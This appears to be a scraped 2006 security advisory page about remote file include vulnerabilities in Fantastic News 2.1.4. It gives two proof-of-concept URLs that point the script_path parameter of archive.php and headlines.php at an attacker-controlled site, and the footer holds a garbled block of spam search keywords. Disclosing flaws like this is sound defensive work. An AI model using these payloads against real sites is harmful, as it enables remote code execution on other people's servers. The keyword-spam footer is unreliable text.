about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Fantastic News Multiple Remote File Include Vulnerabilities


Title Fantastic News Multiple Remote File Include Vulnerabilities
Published 2006-12-27-12:00AM
Updated 2007-01-04-06:26PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Mr-m07 <xp10[at]hotmail.com> is credited with the discovery of these vulnerabilities.
Vulnerable  Fantastic Scripts Fantastic News 2.1.4
Not Vulnerable  
Code   An attacker may exploit these issues using a web client.

The following proof-of-concept script is available:

http://example.com/archive.php?CONFIG[script_path]=attacker site
http://example.com/headlines.php?CONFIG[script_path]=attacker site
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 18:52:12 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.hbw3c. News Searc hot indian Parishilto www.google www.hblipi bollywood+ ACTORES PI www.hbccdb www.hardco www.elf.cz sexy.video 99ed.cn www.haop8. www.sexjen download f www.haoerh www.15800. www.erotic Wwwworldse freexxxvid www.hacker apache ex www.gzyaba 200 /mambo W w wphone google.pl www.gzgome shamale mo www.gz008. Ea fifa 20 Rajeni hit madhu nake www.gxtp.n www trisha tamil sex www.guimou www.ddcd12 bluefilms Ea fifa 20 vBulletin www.guali2 components mambo Remo www.guaish Sania sex free girl cnljk8.jim WPA www.gtato.